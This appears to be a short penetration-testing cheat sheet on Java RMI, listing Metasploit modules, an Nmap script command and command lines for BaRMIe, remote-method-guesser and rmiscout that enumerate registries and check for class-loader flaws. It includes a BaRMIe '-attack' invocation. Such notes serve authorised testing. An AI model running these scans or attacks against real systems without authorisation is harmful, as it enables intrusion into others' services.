java-rmi.md

description
Java Remote Method Invocation

Java RMI

Enumerate

Check if class loader is enabled:

msf > use auxiliary/scanner/misc/java_rmi_server
msf > set RHOSTS file:java_rmi.txt
msf > set THREADS 25
msf > run

Dump registry with MSF:

msf > use auxiliary/gather/java_rmi_registry
msf > set RHOSTS file:java_rmi.txt
msf > run

Dump registry with Nmap:

$ sudo nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" 192.168.1.11 -p1098

BaRMIe

• https://github.com/NickstaDB/BaRMIe

$ java -jar BaRMIe.jar -enum 192.168.1.11 1098
$ java -jar BaRMIe.jar -attack 192.168.1.11 1098

remote-method-guesser

• https://github.com/qtc-de/remote-method-guesser

$ java -jar rmg-3.0.0-jar-with-dependencies.jar 192.168.1.11 1098 enum

rmiscout

• https://github.com/BishopFox/rmiscout